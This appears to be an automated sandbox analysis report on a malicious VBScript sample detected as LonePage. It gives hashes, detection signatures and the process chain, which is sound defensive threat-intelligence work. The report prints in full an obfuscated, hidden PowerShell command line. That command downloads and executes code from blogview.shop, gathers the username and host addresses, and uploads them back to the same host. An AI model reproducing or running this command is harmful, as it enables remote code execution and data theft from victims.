Edit tour
Windows
Analysis Report
sAKF0egIZ5.vbs
Overview
General Information
Sample name: | sAKF0egIZ5.vbsrenamed because original name is a hash value |
Original sample name: | 8e4b8955547646a9cf36ca410a04d694448b3b09874c0b886b0a726b3afb5f3e.vbs |
Analysis ID: | 1542808 |
MD5: | f8e87c59004eb9f061be8865f37c8b02 |
SHA1: | cd46f893ef8e9b0fbf7865511f6a440390255623 |
SHA256: | 8e4b8955547646a9cf36ca410a04d694448b3b09874c0b886b0a726b3afb5f3e |
Tags: | blogview-shopvbsuser-JAMESWT_MHT |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download payload from hardcoded c2 list
VBScript performs obfuscated calls to suspicious functions
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- wscript.exe (PID: 572 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\sAKF0 egIZ5.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6224 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -w hid den -nopro file -c st art-sleep 39;start-s leep (get- random -mi n 5 -max 4 3);start-s leep 11;$i ik=new-obj ect net.we bclient;$r c = -join ((48..57) | get-rand om -count( get-rando m -min 5 - max 15) | foreach-ob ject { [ch ar]$_}) + '.txt';$fl m=$iik.dow nloaddata( 'https://b logview.sh op/api/val ues/383035 2914343819 9171/refre sh199/'+$r c);if($flm .Length -g t 1){$jkr= [system.te xt.encodin g]::utf8.g etString($ flm);if($j kr -match 'get-conte nt'){[byte []] $drpy= IEX $jkr;} else{$bjdo =whoami;$b jdo+='=='; $bjdo+=[Sy stem.Net.D ns]::GetHo stAddresse s($ip)+[Sy stem.Envir onment]::N ewLine;$hb n=IEX $jkr ;$bjdo+=$h bn|Out-str ing;[byte[ ]]$drpy=[s ystem.text .encoding] ::Utf8.Get Bytes($bjd o);};start -sleep 10; $ujk=new-o bject net. webclient; start-slee p 16;$ujk. uploaddata ('https:// blogview.s hop/api/va lues/refre sh199',$dr py);} MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
JoeSecurity_LonePage | Yara detected LonePage | Joe Security | ||
Click to see the 8 entries |
Spreading |
---|
Source: | Author: Joe Security: |